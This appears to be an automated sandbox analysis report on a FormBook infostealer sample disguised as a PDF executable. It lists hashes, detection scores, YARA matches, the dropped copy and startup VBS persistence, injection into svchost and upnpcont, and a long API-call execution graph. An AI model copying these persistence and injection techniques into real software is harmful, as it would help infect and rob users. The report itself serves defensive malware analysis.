                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:21:55:12
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                                                  Imagebase:0xce0000
                                                  File size:1'189'888 bytes
                                                  MD5 hash:8E38E2141423C1BDF6899EF2AAF078F8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 76%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:21:55:14
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                                                  Imagebase:0x640000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:21:55:25
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                                                  Imagebase:0x7ff75e2b0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:21:55:25
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\retrofit\cunila.exe"
                                                  Imagebase:0xce0000
                                                  File size:1'189'888 bytes
                                                  MD5 hash:8E38E2141423C1BDF6899EF2AAF078F8
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:21:55:27
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\retrofit\cunila.exe"
                                                  Imagebase:0x640000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:21:55:51
                                                  Start date:18/11/2024
                                                  Path:C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe"
                                                  Imagebase:0x5f0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:10
                                                  Start time:21:55:54
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\SysWOW64\upnpcont.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\upnpcont.exe"
                                                  Imagebase:0x240000
                                                  File size:35'328 bytes
                                                  MD5 hash:B0B77651795747C81A50BEFA60922B8E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:11
                                                  Start time:21:56:09
                                                  Start date:18/11/2024
                                                  Path:C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe"
                                                  Imagebase:0x5f0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:13
                                                  Start time:21:56:21
                                                  Start date:18/11/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff6bf500000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3.7%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:10.4%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:171
                                                    execution_graph 92392 3b197b 92397 35dd94 92392->92397 92396 3b198a 92405 35f4ea 92397->92405 92399 35dd9c 92400 35ddb0 92399->92400 92414 35df3d 92399->92414 92404 360f0a 52 API calls __cinit 92400->92404 92404->92396 92407 35f4f2 __calloc_impl 92405->92407 92408 35f50c 92407->92408 92409 35f50e std::exception::exception 92407->92409 92446 36395c 92407->92446 92408->92399 92460 366805 RaiseException 92409->92460 92411 35f538 92461 36673b 47 API calls _free 92411->92461 92413 35f54a 92413->92399 92415 35df46 92414->92415 92416 35dda8 92414->92416 92468 360f0a 52 API calls __cinit 92415->92468 92418 35ddc0 92416->92418 92469 34d7f7 92418->92469 92422 35de1a 92485 35dfb4 92422->92485 92427 3b24c8 92430 35dea4 GetCurrentProcess 92502 35df5f LoadLibraryA GetProcAddress 92430->92502 92431 35debb 92433 35df31 GetSystemInfo 92431->92433 92434 35dee3 92431->92434 92435 35df0e 92433->92435 92496 35e00c 92434->92496 92437 35df21 92435->92437 92438 35df1c FreeLibrary 92435->92438 92437->92400 92438->92437 92440 35df29 GetSystemInfo 92443 35df03 92440->92443 92441 35def9 92499 35dff4 92441->92499 92443->92435 92445 35df09 FreeLibrary 92443->92445 92445->92435 92447 3639d7 __calloc_impl 92446->92447 92453 363968 __calloc_impl 92446->92453 92467 367c0e 47 API calls __getptd_noexit 92447->92467 92450 36399b RtlAllocateHeap 92450->92453 92459 3639cf 92450->92459 92452 363973 92452->92453 92462 3681c2 47 API calls __NMSG_WRITE 92452->92462 92463 36821f 47 API calls 6 library calls 92452->92463 92464 361145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92452->92464 92453->92450 92453->92452 92454 3639c3 92453->92454 92457 3639c1 92453->92457 92465 367c0e 47 API calls __getptd_noexit 92454->92465 92466 367c0e 47 API calls __getptd_noexit 92457->92466 92459->92407 92460->92411 92461->92413 92462->92452 92463->92452 92465->92457 92466->92459 92467->92459 92468->92416 92470 35f4ea 48 API calls 92469->92470 92471 34d818 92470->92471 92472 35f4ea 48 API calls 92471->92472 92473 34d826 GetVersionExW 92472->92473 92474 346a63 92473->92474 92475 346adf 92474->92475 92478 346a6f __wsetenvp 92474->92478 92516 34b18b 92475->92516 92477 346ab6 ___crtGetEnvironmentStringsW 92477->92422 92479 346ad7 92478->92479 92480 346a8b 92478->92480 92515 34c369 48 API calls 92479->92515 92503 346b4a 92480->92503 92483 346a95 92506 35ee75 92483->92506 92486 35dfbd 92485->92486 92487 34b18b 48 API calls 92486->92487 92488 35de22 92487->92488 92489 346571 92488->92489 92490 34657f 92489->92490 92491 34b18b 48 API calls 92490->92491 92492 34658f 92491->92492 92492->92427 92493 35df77 92492->92493 92528 35df89 92493->92528 92532 35e01e 92496->92532 92500 35e00c 2 API calls 92499->92500 92501 35df01 GetNativeSystemInfo 92500->92501 92501->92443 92502->92431 92504 35f4ea 48 API calls 92503->92504 92505 346b54 92504->92505 92505->92483 92508 35f4ea __calloc_impl 92506->92508 92507 36395c __malloc_crt 47 API calls 92507->92508 92508->92507 92509 35f50c 92508->92509 92510 35f50e std::exception::exception 92508->92510 92509->92477 92520 366805 RaiseException 92510->92520 92512 35f538 92521 36673b 47 API calls _free 92512->92521 92514 35f54a 92514->92477 92515->92477 92517 34b1a2 ___crtGetEnvironmentStringsW 92516->92517 92518 34b199 92516->92518 92517->92477 92518->92517 92522 34bdfa 92518->92522 92520->92512 92521->92514 92523 34be0d 92522->92523 92527 34be0a ___crtGetEnvironmentStringsW 92522->92527 92524 35f4ea 48 API calls 92523->92524 92525 34be17 92524->92525 92526 35ee75 48 API calls 92525->92526 92526->92527 92527->92517 92529 35dea0 92528->92529 92530 35df92 LoadLibraryA 92528->92530 92529->92430 92529->92431 92530->92529 92531 35dfa3 GetProcAddress 92530->92531 92531->92529 92533 35def1 92532->92533 92534 35e027 LoadLibraryA 92532->92534 92533->92440 92533->92441 92534->92533 92535 35e038 GetProcAddress 92534->92535 92535->92533 92536 3b19ba 92541 35c75a 92536->92541 92540 3b19c9 92542 34d7f7 48 API calls 92541->92542 92543 35c7c8 92542->92543 92549 35d26c 92543->92549 92546 35c865 92547 35c881 92546->92547 92552 35d1fa 48 API calls ___crtGetEnvironmentStringsW 92546->92552 92548 360f0a 52 API calls __cinit 92547->92548 92548->92540 92553 35d298 92549->92553 92552->92546 92554 35d28b 92553->92554 92555 35d2a5 92553->92555 92554->92546 92555->92554 92556 35d2ac RegOpenKeyExW 92555->92556 92556->92554 92557 35d2c6 RegQueryValueExW 92556->92557 92558 35d2fc RegCloseKey 92557->92558 92559 35d2e7 92557->92559 92558->92554 92559->92558 92560 3b8eb8 92564 38a635 92560->92564 92562 3b8ec3 92563 38a635 84 API calls 92562->92563 92563->92562 92570 38a66f 92564->92570 92572 38a642 92564->92572 92565 38a671 92605 35ec4e 81 API calls 92565->92605 92566 38a676 92575 34936c 92566->92575 92569 38a67d 92595 34510d 92569->92595 92570->92562 92572->92565 92572->92566 92572->92570 92573 38a669 92572->92573 92604 354525 61 API calls ___crtGetEnvironmentStringsW 92573->92604 92576 349384 92575->92576 92593 349380 92575->92593 92577 3b4cbd __i64tow 92576->92577 92578 3b4bbf 92576->92578 92579 349398 92576->92579 92585 3493b0 __itow Mailbox _wcscpy 92576->92585 92581 3b4bc8 92578->92581 92582 3b4ca5 92578->92582 92606 36172b 80 API calls 3 library calls 92579->92606 92581->92585 92586 3b4be7 92581->92586 92613 36172b 80 API calls 3 library calls 92582->92613 92583 35f4ea 48 API calls 92587 3493ba 92583->92587 92585->92583 92588 35f4ea 48 API calls 92586->92588 92587->92593 92607 34ce19 92587->92607 92590 3b4c04 92588->92590 92591 35f4ea 48 API calls 92590->92591 92592 3b4c2a 92591->92592 92592->92593 92594 34ce19 48 API calls 92592->92594 92593->92569 92594->92593 92596 34511f 92595->92596 92597 3b1be7 92595->92597 92614 34b384 92596->92614 92623 37a58f 48 API calls ___crtGetEnvironmentStringsW 92597->92623 92600 34512b 92600->92570 92601 3b1bf1 92624 346eed 92601->92624 92603 3b1bf9 Mailbox 92604->92570 92605->92566 92606->92585 92608 34ce28 __wsetenvp 92607->92608 92609 35ee75 48 API calls 92608->92609 92610 34ce50 ___crtGetEnvironmentStringsW 92609->92610 92611 35f4ea 48 API calls 92610->92611 92612 34ce66 92611->92612 92612->92593 92613->92585 92615 34b3c5 ___crtGetEnvironmentStringsW 92614->92615 92616 34b392 92614->92616 92615->92600 92615->92615 92616->92615 92617 34b3fd 92616->92617 92618 34b3b8 92616->92618 92620 35f4ea 48 API calls 92617->92620 92628 34bb85 92618->92628 92621 34b407 92620->92621 92622 35f4ea 48 API calls 92621->92622 92622->92615 92623->92601 92625 346f00 92624->92625 92626 346ef8 92624->92626 92625->92603 92633 34dd47 48 API calls ___crtGetEnvironmentStringsW 92626->92633 92629 34bb9b 92628->92629 92632 34bb96 ___crtGetEnvironmentStringsW 92628->92632 92630 35ee75 48 API calls 92629->92630 92631 3b1b77 92629->92631 92630->92632 92632->92615 92633->92625 92634 3b19dd 92639 344a30 92634->92639 92636 3b19f1 92659 360f0a 52 API calls __cinit 92636->92659 92638 3b19fb 92640 344a40 __ftell_nolock 92639->92640 92641 34d7f7 48 API calls 92640->92641 92642 344af6 92641->92642 92660 345374 92642->92660 92644 344aff 92667 34363c 92644->92667 92651 34d7f7 48 API calls 92652 344b32 92651->92652 92689 3449fb 92652->92689 92654 344b43 Mailbox 92654->92636 92655 34ce19 48 API calls 92657 344b3d _wcscat Mailbox __wsetenvp 92655->92657 92656 3464cf 48 API calls 92656->92657 92657->92654 92657->92655 92657->92656 92658 3461a6 48 API calls 92657->92658 92658->92657 92659->92638 92703 36f8a0 92660->92703 92663 34ce19 48 API calls 92664 3453a7 92663->92664 92705 34660f 92664->92705 92666 3453b1 Mailbox 92666->92644 92668 343649 __ftell_nolock 92667->92668 92712 34366c GetFullPathNameW 92668->92712 92670 34365a 92671 346a63 48 API calls 92670->92671 92672 343669 92671->92672 92673 34518c 92672->92673 92674 345197 92673->92674 92675 3b1ace 92674->92675 92676 34519f 92674->92676 92678 346b4a 48 API calls 92675->92678 92714 345130 92676->92714 92680 3b1adb __wsetenvp 92678->92680 92679 344b18 92683 3464cf 92679->92683 92681 35ee75 48 API calls 92680->92681 92682 3b1b07 ___crtGetEnvironmentStringsW 92681->92682 92684 34651b 92683->92684 92688 3464dd ___crtGetEnvironmentStringsW 92683->92688 92686 35f4ea 48 API calls 92684->92686 92685 35f4ea 48 API calls 92687 344b29 92685->92687 92686->92688 92687->92651 92688->92685 92724 34bcce 92689->92724 92692 3b41cc RegQueryValueExW 92694 3b4246 RegCloseKey 92692->92694 92695 3b41e5 92692->92695 92693 344a2b 92693->92657 92696 35f4ea 48 API calls 92695->92696 92697 3b41fe 92696->92697 92730 3447b7 92697->92730 92700 3b423b 92700->92694 92701 3b4224 92702 346a63 48 API calls 92701->92702 92702->92700 92704 345381 GetModuleFileNameW 92703->92704 92704->92663 92706 36f8a0 __ftell_nolock 92705->92706 92707 34661c GetFullPathNameW 92706->92707 92708 346a63 48 API calls 92707->92708 92709 346643 92708->92709 92710 346571 48 API calls 92709->92710 92711 34664f 92710->92711 92711->92666 92713 34368a 92712->92713 92713->92670 92715 34513f __wsetenvp 92714->92715 92716 345151 92715->92716 92717 3b1b27 92715->92717 92718 34bb85 48 API calls 92716->92718 92719 346b4a 48 API calls 92717->92719 92720 34515e ___crtGetEnvironmentStringsW 92718->92720 92721 3b1b34 92719->92721 92720->92679 92722 35ee75 48 API calls 92721->92722 92723 3b1b57 ___crtGetEnvironmentStringsW 92722->92723 92725 34bce8 92724->92725 92729 344a0a RegOpenKeyExW 92724->92729 92726 35f4ea 48 API calls 92725->92726 92727 34bcf2 92726->92727 92728 35ee75 48 API calls 92727->92728 92728->92729 92729->92692 92729->92693 92731 35f4ea 48 API calls 92730->92731 92732 3447c9 RegQueryValueExW 92731->92732 92732->92700 92732->92701 92733 365dfd 92734 365e09 __fcloseall 92733->92734 92770 367eeb GetStartupInfoW 92734->92770 92737 365e0e 92772 369ca7 GetProcessHeap 92737->92772 92738 365e66 92739 365e71 92738->92739 92854 365f4d 47 API calls 3 library calls 92738->92854 92773 367b47 92739->92773 92742 365e77 92743 365e82 __RTC_Initialize 92742->92743 92855 365f4d 47 API calls 3 library calls 92742->92855 92794 36acb3 92743->92794 92746 365e91 92747 365e9d GetCommandLineW 92746->92747 92856 365f4d 47 API calls 3 library calls 92746->92856 92813 372e7d GetEnvironmentStringsW 92747->92813 92750 365e9c 92750->92747 92753 365eb7 92754 365ec2 92753->92754 92857 36115b 47 API calls 3 library calls 92753->92857 92823 372cb4 92754->92823 92757 365ec8 92758 365ed3 92757->92758 92858 36115b 47 API calls 3 library calls 92757->92858 92837 361195 92758->92837 92761 365edb 92762 365ee6 __wwincmdln 92761->92762 92859 36115b 47 API calls 3 library calls 92761->92859 92841 343a0f 92762->92841 92765 365efa 92766 365f09 92765->92766 92860 3613f1 47 API calls _doexit 92765->92860 92861 361186 47 API calls _doexit 92766->92861 92769 365f0e __fcloseall 92771 367f01 92770->92771 92771->92737 92772->92738 92862 36123a 30 API calls 2 library calls 92773->92862 92775 367b4c 92863 367e23 InitializeCriticalSectionAndSpinCount 92775->92863 92777 367b51 92778 367b55 92777->92778 92865 367e6d TlsAlloc 92777->92865 92864 367bbd 50 API calls 2 library calls 92778->92864 92781 367b5a 92781->92742 92782 367b67 92782->92778 92783 367b72 92782->92783 92866 366986 92783->92866 92786 367bb4 92874 367bbd 50 API calls 2 library calls 92786->92874 92789 367b93 92789->92786 92791 367b99 92789->92791 92790 367bb9 92790->92742 92873 367a94 47 API calls 4 library calls 92791->92873 92793 367ba1 GetCurrentThreadId 92793->92742 92795 36acbf __fcloseall 92794->92795 92883 367cf4 92795->92883 92797 36acc6 92798 366986 __calloc_crt 47 API calls 92797->92798 92800 36acd7 92798->92800 92799 36ad42 GetStartupInfoW 92802 36ad57 92799->92802 92809 36ae80 92799->92809 92800->92799 92801 36ace2 __fcloseall @_EH4_CallFilterFunc@8 92800->92801 92801->92746 92806 366986 __calloc_crt 47 API calls 92802->92806 92808 36ada5 92802->92808 92802->92809 92803 36af44 92890 36af58 LeaveCriticalSection _doexit 92803->92890 92805 36aec9 GetStdHandle 92805->92809 92806->92802 92807 36aedb GetFileType 92807->92809 92808->92809 92811 36add7 GetFileType 92808->92811 92812 36ade5 InitializeCriticalSectionAndSpinCount 92808->92812 92809->92803 92809->92805 92809->92807 92810 36af08 InitializeCriticalSectionAndSpinCount 92809->92810 92810->92809 92811->92808 92811->92812 92812->92808 92814 365ead 92813->92814 92815 372e8e 92813->92815 92819 372a7b GetModuleFileNameW 92814->92819 92816 3669d0 __malloc_crt 47 API calls 92815->92816 92818 372eb4 ___crtGetEnvironmentStringsW 92816->92818 92817 372eca FreeEnvironmentStringsW 92817->92814 92818->92817 92820 372aaf _wparse_cmdline 92819->92820 92821 3669d0 __malloc_crt 47 API calls 92820->92821 92822 372aef _wparse_cmdline 92820->92822 92821->92822 92822->92753 92824 372ccd __wsetenvp 92823->92824 92828 372cc5 92823->92828 92825 366986 __calloc_crt 47 API calls 92824->92825 92826 372cf6 __wsetenvp 92825->92826 92826->92828 92829 366986 __calloc_crt 47 API calls 92826->92829 92830 372d4d 92826->92830 92831 372d72 92826->92831 92834 372d89 92826->92834 92933 372567 47 API calls __Wcsftime_l 92826->92933 92827 361c9d _free 47 API calls 92827->92828 92828->92757 92829->92826 92830->92827 92832 361c9d _free 47 API calls 92831->92832 92832->92828 92934 366e20 IsProcessorFeaturePresent 92834->92934 92836 372d95 92836->92757 92838 3611a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92837->92838 92840 3611e0 __IsNonwritableInCurrentImage 92838->92840 92957 360f0a 52 API calls __cinit 92838->92957 92840->92761 92842 3b1ebf 92841->92842 92843 343a29 92841->92843 92844 343a63 IsThemeActive 92843->92844 92958 361405 92844->92958 92848 343a8f 92970 343adb SystemParametersInfoW SystemParametersInfoW 92848->92970 92850 343a9b 92971 343d19 92850->92971 92852 343aa3 SystemParametersInfoW 92853 343ac8 92852->92853 92853->92765 92854->92739 92855->92743 92856->92750 92860->92766 92861->92769 92862->92775 92863->92777 92864->92781 92865->92782 92868 36698d 92866->92868 92869 3669ca 92868->92869 92870 3669ab Sleep 92868->92870 92875 3730aa 92868->92875 92869->92786 92872 367ec9 TlsSetValue 92869->92872 92871 3669c2 92870->92871 92871->92868 92871->92869 92872->92789 92873->92793 92874->92790 92876 3730b5 92875->92876 92877 3730d0 __calloc_impl 92875->92877 92876->92877 92878 3730c1 92876->92878 92880 3730e0 HeapAlloc 92877->92880 92881 3730c6 92877->92881 92882 367c0e 47 API calls __getptd_noexit 92878->92882 92880->92877 92880->92881 92881->92868 92882->92881 92884 367d05 92883->92884 92885 367d18 EnterCriticalSection 92883->92885 92891 367d7c 92884->92891 92885->92797 92887 367d0b 92887->92885 92914 36115b 47 API calls 3 library calls 92887->92914 92890->92801 92892 367d88 __fcloseall 92891->92892 92893 367d91 92892->92893 92894 367da9 92892->92894 92915 3681c2 47 API calls __NMSG_WRITE 92893->92915 92906 367dc9 __fcloseall 92894->92906 92918 3669d0 92894->92918 92896 367d96 92916 36821f 47 API calls 6 library calls 92896->92916 92900 367dc4 92924 367c0e 47 API calls __getptd_noexit 92900->92924 92901 367dd3 92904 367cf4 __lock 46 API calls 92901->92904 92902 367d9d 92917 361145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92902->92917 92907 367dda 92904->92907 92906->92887 92909 367dfe 92907->92909 92910 367de9 InitializeCriticalSectionAndSpinCount 92907->92910 92925 361c9d 92909->92925 92911 367e04 92910->92911 92931 367e1a LeaveCriticalSection _doexit 92911->92931 92915->92896 92916->92902 92921 3669de 92918->92921 92919 36395c __malloc_crt 46 API calls 92919->92921 92920 366a12 92920->92900 92920->92901 92921->92919 92921->92920 92922 3669f1 Sleep 92921->92922 92923 366a0a 92922->92923 92923->92920 92923->92921 92924->92906 92926 361ca6 RtlFreeHeap 92925->92926 92930 361ccf _free 92925->92930 92927 361cbb 92926->92927 92926->92930 92932 367c0e 47 API calls __getptd_noexit 92927->92932 92929 361cc1 GetLastError 92929->92930 92930->92911 92931->92906 92932->92929 92933->92826 92935 366e2b 92934->92935 92940 366cb5 92935->92940 92939 366e46 92939->92836 92941 366ccf _memset __call_reportfault 92940->92941 92942 366cef IsDebuggerPresent 92941->92942 92948 3681ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92942->92948 92945 366db3 __call_reportfault 92949 36a70c 92945->92949 92946 366dd6 92947 368197 GetCurrentProcess TerminateProcess 92946->92947 92947->92939 92948->92945 92950 36a716 IsProcessorFeaturePresent 92949->92950 92951 36a714 92949->92951 92953 3737b0 92950->92953 92951->92946 92956 37375f 5 API calls 2 library calls 92953->92956 92955 373893 92955->92946 92956->92955 92957->92840 92959 367cf4 __lock 47 API calls 92958->92959 92960 361410 92959->92960 93023 367e58 LeaveCriticalSection 92960->93023 92962 343a88 92963 36146d 92962->92963 92964 361477 92963->92964 92965 361491 92963->92965 92964->92965 93024 367c0e 47 API calls __getptd_noexit 92964->93024 92965->92848 92967 361481 93025 366e10 8 API calls __Wcsftime_l 92967->93025 92969 36148c 92969->92848 92970->92850 92972 343d26 __ftell_nolock 92971->92972 92973 34d7f7 48 API calls 92972->92973 92974 343d31 GetCurrentDirectoryW 92973->92974 93026 3461ca 92974->93026 92976 343d57 IsDebuggerPresent 92977 343d65 92976->92977 92978 3b1cc1 MessageBoxA 92976->92978 92979 343e3a 92977->92979 92981 3b1cd9 92977->92981 92982 343d82 92977->92982 92978->92981 92980 343e41 SetCurrentDirectoryW 92979->92980 92984 343e4e Mailbox 92980->92984 93203 35c682 48 API calls 92981->93203 93100 3440e5 92982->93100 92984->92852 92986 3b1ce9 92991 3b1cff SetCurrentDirectoryW 92986->92991 92988 343da0 GetFullPathNameW 92989 346a63 48 API calls 92988->92989 92990 343ddb 92989->92990 93116 346430 92990->93116 92991->92984 92994 343df6 92995 343e00 92994->92995 93204 3871fa AllocateAndInitializeSid CheckTokenMembership FreeSid 92994->93204 93132 343e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 92995->93132 92998 3b1d1c 92998->92995 93001 3b1d2d 92998->93001 93003 345374 50 API calls 93001->93003 93002 343e0a 93004 343e1f 93002->93004 93201 344ffc 67 API calls _memset 93002->93201 93006 3b1d35 93003->93006 93140 34e8d0 93004->93140 93009 34ce19 48 API calls 93006->93009 93010 3b1d42 93009->93010 93012 3b1d49 93010->93012 93013 3b1d6e 93010->93013 93015 34518c 48 API calls 93012->93015 93014 34518c 48 API calls 93013->93014 93017 3b1d6a GetForegroundWindow ShellExecuteW 93014->93017 93016 3b1d54 93015->93016 93018 34510d 48 API calls 93016->93018 93021 3b1d9e Mailbox 93017->93021 93020 3b1d61 93018->93020 93022 34518c 48 API calls 93020->93022 93021->92979 93022->93017 93023->92962 93024->92967 93025->92969 93205 35e99b 93026->93205 93030 3461eb 93031 345374 50 API calls 93030->93031 93032 3461ff 93031->93032 93033 34ce19 48 API calls 93032->93033 93034 34620c 93033->93034 93222 3439db 93034->93222 93036 346216 Mailbox 93037 346eed 48 API calls 93036->93037 93038 34622b 93037->93038 93234 349048 93038->93234 93041 34ce19 48 API calls 93042 346244 93041->93042 93237 34d6e9 93042->93237 93044 346254 Mailbox 93045 34ce19 48 API calls 93044->93045 93046 34627c 93045->93046 93047 34d6e9 55 API calls 93046->93047 93048 34628f Mailbox 93047->93048 93049 34ce19 48 API calls 93048->93049 93050 3462a0 93049->93050 93241 34d645 93050->93241 93052 3462b2 Mailbox 93053 34d7f7 48 API calls 93052->93053 93054 3462c5 93053->93054 93251 3463fc 93054->93251 93058 3462df 93059 3b1c08 93058->93059 93060 3462e9 93058->93060 93061 3463fc 48 API calls 93059->93061 93062 360fa7 _W_store_winword 59 API calls 93060->93062 93063 3b1c1c 93061->93063 93064 3462f4 93062->93064 93066 3463fc 48 API calls 93063->93066 93064->93063 93065 3462fe 93064->93065 93067 360fa7 _W_store_winword 59 API calls 93065->93067 93068 3b1c38 93066->93068 93069 346309 93067->93069 93071 345374 50 API calls 93068->93071 93069->93068 93070 346313 93069->93070 93072 360fa7 _W_store_winword 59 API calls 93070->93072 93073 3b1c5d 93071->93073 93074 34631e 93072->93074 93076 3463fc 48 API calls 93073->93076 93075 34635f 93074->93075 93077 3b1c86 93074->93077 93080 3463fc 48 API calls 93074->93080 93075->93077 93078 34636c 93075->93078 93079 3b1c69 93076->93079 93081 346eed 48 API calls 93077->93081 93267 35c050 93078->93267 93082 346eed 48 API calls 93079->93082 93083 346342 93080->93083 93084 3b1ca8 93081->93084 93086 3b1c77 93082->93086 93087 346eed 48 API calls 93083->93087 93088 3463fc 48 API calls 93084->93088 93090 3463fc 48 API calls 93086->93090 93091 346350 93087->93091 93092 3b1cb5 93088->93092 93089 346384 93278 351b90 93089->93278 93090->93077 93094 3463fc 48 API calls 93091->93094 93092->93092 93094->93075 93095 351b90 48 API calls 93097 346394 93095->93097 93097->93095 93098 3463fc 48 API calls 93097->93098 93099 3463d6 Mailbox 93097->93099 93294 346b68 48 API calls 93097->93294 93098->93097 93099->92976 93101 3440f2 __ftell_nolock 93100->93101 93102 3b370e _memset 93101->93102 93103 34410b 93101->93103 93105 3b372a GetOpenFileNameW 93102->93105 93104 34660f 49 API calls 93103->93104 93106 344114 93104->93106 93107 3b3779 93105->93107 93821 3440a7 93106->93821 93110 346a63 48 API calls 93107->93110 93112 3b378e 93110->93112 93112->93112 93113 344129 93839 344139 93113->93839 93117 34643d __ftell_nolock 93116->93117 94049 344c75 93117->94049 93119 346442 93131 343dee 93119->93131 94060 345928 86 API calls 93119->94060 93121 34644f 93121->93131 94061 345798 88 API calls Mailbox 93121->94061 93123 346458 93124 34645c GetFullPathNameW 93123->93124 93123->93131 93125 346a63 48 API calls 93124->93125 93126 346488 93125->93126 93127 346a63 48 API calls 93126->93127 93128 346495 93127->93128 93129 346a63 48 API calls 93128->93129 93130 3b5dcf _wcscat 93128->93130 93129->93131 93131->92986 93131->92994 93133 3b1cba 93132->93133 93134 343ed8 93132->93134 94103 344024 93134->94103 